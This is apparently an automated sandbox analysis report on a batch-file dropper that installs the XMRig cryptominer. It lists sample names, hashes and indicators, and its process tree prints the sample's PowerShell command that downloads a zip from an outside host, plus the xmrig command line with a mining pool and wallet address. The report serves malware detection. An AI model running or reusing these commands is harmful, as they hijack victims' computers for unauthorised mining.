Overview
overview
10Static
static
1tesy - Copy (10).bat
windows7-x64
10tesy - Copy (10).bat
windows10-2004-x64
10tesy - Copy (11).bat
windows7-x64
10tesy - Copy (11).bat
windows10-2004-x64
10tesy - Copy (12).bat
windows7-x64
10tesy - Copy (12).bat
windows10-2004-x64
10tesy - Copy (13).bat
windows7-x64
10tesy - Copy (13).bat
windows10-2004-x64
10tesy - Copy (14).bat
windows7-x64
10tesy - Copy (14).bat
windows10-2004-x64
10tesy - Copy (2).bat
windows7-x64
10tesy - Copy (2).bat
windows10-2004-x64
10tesy - Copy (3).bat
windows7-x64
10tesy - Copy (3).bat
windows10-2004-x64
10tesy - Copy (4).bat
windows7-x64
10tesy - Copy (4).bat
windows10-2004-x64
10tesy - Copy (5).bat
windows7-x64
10tesy - Copy (5).bat
windows10-2004-x64
10tesy - Copy (6).bat
windows7-x64
10tesy - Copy (6).bat
windows10-2004-x64
10tesy - Copy (7).bat
windows7-x64
10tesy - Copy (7).bat
windows10-2004-x64
10tesy - Copy (8).bat
windows7-x64
10tesy - Copy (8).bat
windows10-2004-x64
10tesy - Copy (9).bat
windows7-x64
10tesy - Copy (9).bat
windows10-2004-x64
10tesy - Copy.bat
windows7-x64
10tesy - Copy.bat
windows10-2004-x64
10tesy.bat
windows7-x64
10tesy.bat
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
14-10-2023 13:23
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
tesy - Copy (10).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
tesy - Copy (11).bat
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
tesy - Copy (11).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
tesy - Copy (12).bat
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
tesy - Copy (12).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
tesy - Copy (13).bat
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
tesy - Copy (13).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
tesy - Copy (14).bat
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
tesy - Copy (14).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
tesy - Copy (2).bat
Resource
win7-20230831-en
Behavioral task
behavioral12
Sample
tesy - Copy (2).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
tesy - Copy (3).bat
Resource
win7-20230831-en
Behavioral task
behavioral14
Sample
tesy - Copy (3).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
tesy - Copy (4).bat
Resource
win7-20230831-en
Behavioral task
behavioral16
Sample
tesy - Copy (4).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
tesy - Copy (5).bat
Resource
win7-20230831-en
Behavioral task
behavioral18
Sample
tesy - Copy (5).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
tesy - Copy (6).bat
Resource
win7-20230831-en
Behavioral task
behavioral20
Sample
tesy - Copy (6).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral21
Sample
tesy - Copy (7).bat
Resource
win7-20230831-en
Behavioral task
behavioral22
Sample
tesy - Copy (7).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral23
Sample
tesy - Copy (8).bat
Resource
win7-20230831-en
Behavioral task
behavioral24
Sample
tesy - Copy (8).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral25
Sample
tesy - Copy (9).bat
Resource
win7-20230831-en
Behavioral task
behavioral26
Sample
tesy - Copy (9).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral27
Sample
tesy - Copy.bat
Resource
win7-20230831-en
Behavioral task
behavioral28
Sample
tesy - Copy.bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral29
Sample
tesy.bat
Resource
win7-20230831-en
General
-
Target
tesy - Copy (3).bat
-
Size
702B
-
MD5
65f016a2abe40d2902c7032438a14bd7
-
SHA1
b3537668ca1bb826e5085aee38b3f7ec654d606e
-
SHA256
153b384b64bd371e0236c8497c9706db00cc102f068ea8fd4569d20b3b5a6fd8
-
SHA512
b52486cdc585277de12287b4b2ab17c9e401bfeaee78555fd6d8760d7954b4e361f6e3ec32e4d694ba2cfa69d3d843d0f192539f0c893500b801c05a13b488f7
Malware Config
Extracted
https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip
Signatures
-
XMRig Miner payload 16 IoCs
resource yara_rule behavioral14/files/0x000700000002309e-46.dat family_xmrig behavioral14/files/0x000700000002309e-46.dat xmrig behavioral14/memory/1304-49-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-52-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-55-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-56-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-57-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-58-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-59-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-60-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-61-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-62-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-63-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-64-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-65-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig behavioral14/memory/1304-66-0x00007FF78A930000-0x00007FF78B433000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 16 1532 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1304 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1532 powershell.exe 1532 powershell.exe 3592 powershell.exe 3592 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1532 powershell.exe Token: SeDebugPrivilege 3592 powershell.exe Token: SeLockMemoryPrivilege 1304 xmrig.exe Token: SeLockMemoryPrivilege 1304 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1304 xmrig.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2252 wrote to memory of 1532 2252 cmd.exe 87 PID 2252 wrote to memory of 1532 2252 cmd.exe 87 PID 2252 wrote to memory of 3592 2252 cmd.exe 88 PID 2252 wrote to memory of 3592 2252 cmd.exe 88 PID 2252 wrote to memory of 3836 2252 cmd.exe 92 PID 2252 wrote to memory of 3836 2252 cmd.exe 92 PID 3836 wrote to memory of 1304 3836 cmd.exe 95 PID 3836 wrote to memory of 1304 3836 cmd.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (3).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip', 'test.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'test.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K start.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\xmrig.exexmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ.TRI -p x3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1304
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b1e180583d3525f6534cc1110224a5fb
SHA1b7cadce5826cdbe5b7a16cc6116522e7885882b7
SHA2562e7e0e975fd986c9156ccaf646991dc1f1620e0330ff7b934dbdfd5a7c4567f7
SHA512a8b64bd8c0709ae0440846e98d9e8023506c5fc3228c5a4bb2a5ae29bc310fb7cf833219766a1305b708bd7f1b21d76b3efa1169d5c7ffa09412d2a4bb600752
-
Filesize
1KB
MD531fbb29b96d20224fd18a99207b8715c
SHA1eb971562570f35c05b05ed4f6bc34296a1fc0ac9
SHA25610f64ec2e9227c3488ef48189dcdc5e1e1bd9429e324685ab5c70f0c36dbe988
SHA51210fad355377623044e64ff4368ae421aa4117947bdda066475800e15655d689060a465d4c2c070ad0b9b9236d9532cfd464acaa25fc18662110f050268cca0e5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.2MB
MD53238c0d25d84b6f0bb645bbb29cdbf61
SHA111ae550c8a82c0793862c366b92072ad7e18befe
SHA256b7a3d27640d4a7403c306a61996d604f28c44c2267eb9d60ed770ad40b3b5dfb
SHA512d5c3e51f36b05ed6b66d501936fc771b712929fa9cdcb3e784d64e018ce4f081cead7a80c48504ced2f7b375bdcc94e147be1fc4e566af45ddaeb60389dee556
-
Filesize
170B
MD578657df2e34e338ff135d3dde69177bf
SHA1d5048a4270b7ba599e941d26d61bfa2e8da31fce
SHA2569004d356a2f71e3abd655983967aa597e81a8133069ee8bcef04f6ed0b36ae98
SHA512f05cd30046793f60d8afd61b0a83f53d0c8e2889a03cbace1b199de181257771d257ab47f29effd1084c196eba9454ccdd97715e6f1062c079f4087685bd7004
-
Filesize
7.9MB
MD54813fa6d610e180b097eae0ce636d2aa
SHA11e9cd17ea32af1337dd9a664431c809dd8a64d76
SHA2569ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc
SHA5125463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa